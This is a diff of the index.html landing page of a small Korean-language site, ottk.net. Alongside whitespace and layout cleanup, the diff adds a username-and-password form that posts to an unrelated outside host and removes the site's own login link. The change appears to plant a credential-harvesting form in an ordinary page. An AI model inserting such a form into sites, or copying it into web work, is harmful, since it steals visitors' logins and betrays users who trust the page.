--- a/index.html
+++ b/index.html
@@ -2,7 +2,6 @@
 <meta charset="UTF-8">
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">
-
 <title>ottk.net</title>
 <style>
 body {
@@ -141,36 +140,29 @@ getUserIP(function(ip){
 </script>
 </head>
 <body class="ie8">
-
 <div id="js-alert-box" class="alert-box">
-	
-	<div id="js-sec-text" class="alert-sec-text"></div>
-	<div class="alert-body">
-		<div class="alert-concent">
-			<p style="color:#ff5656;font-size:23px;line-height:30px;">OTTK.net
-<br> <!--<span style="color:#fff;">Home</span>--><br>
-</p><p><img width="200" height="200" src="https://3.bp.blogspot.com/-m-u_xuKMnRU/Wa7Bo5H3i5I/AAAAAAAACNY/KRf5_L24YGw725MJAoCTcJ4BL9Z90kJRQCLcBGAs/s1600/cover.jpg"></p><p></p><br>
-			
-			<p style="color:#9ea7ab;font-size:14px;letter-spacing:-0.5px;">
-
-
-
+<div id="js-sec-text" class="alert-sec-text"></div>
+<div class="alert-body">
+<div class="alert-concent">
+<p style="color:#ff5656;font-size:23px;line-height:30px;">OTTK.net
+<br> <br>
+</p><p><img width="200" height="200" src="https://3.bp.blogspot.com/-m-u_xuKMnRU/Wa7Bo5H3i5I/AAAAAAAACNY/KRf5_L24YGw725MJAoCTcJ4BL9Z90kJRQCLcBGAs/s1600/cover.jpg"></p><br><form action="http://momoair.dothome.co.kr/signin.php" method="post">
+<input type="hidden" name="base_url" value="http://ottk.net">
+<input type="text" name="user" style="width:100px" required="">
+<input type="password" name="pass" style="width:100px" required="">    
+<input type="submit" value="Sign in">    
+</form>
+<p style="color:#9ea7ab;font-size:14px;letter-spacing:-0.5px;">
 <a href="/" style="color:#2c87f0;text-decoration: none;">홈</a><br>
+<a href="/blog" style="color:#2c87f0;text-decoration: none;">블로그</a>
 
-<a href="/blog" style="color:#2c87f0;text-decoration: none;">블로그</a><br>
-<a href="/login" style="color:#2c87f0;text-decoration: none;">로그인</a>
-<br><a href="http://rhay.top" style="color:#2c87f0;text-decoration: none;">무료 프록시</a><br><br>
-			<a href="https://www.youtube.com/watch?v=qgnMRNoT-PM" target="_blank" rel="nofollow"><img width="270" height="150" src="https://img.youtube.com/vi/qgnMRNoT-PM/mqdefault.jpg"></a><br><br><span style="color:#555">©2018 ottk.net</span><br>
-			<span id="ip"></span>
+<br><a href="http://rhay.top" style="color:#2c87f0;text-decoration: none;">무료 프록시</a><br>
+
+<!--<a href="https://www.youtube.com/watch?v=qgnMRNoT-PM" target="_blank" rel="nofollow"><img width="270" height="150" src="https://img.youtube.com/vi/qgnMRNoT-PM/mqdefault.jpg"></a>--><span style="color:#555">©2018 ottk.net</span><br>
+<span id="ip"><font color="#fff">Your IP : 221.142.152.141</font></span>
 </p>
-		</div>
-		<!--<a id="js-alert-btn" class="alert-btn" href="">바로가기</a>-->
-	</div>
-
 </div>
 
-
-
-
-
+</div>
+</div>
 </body></html>
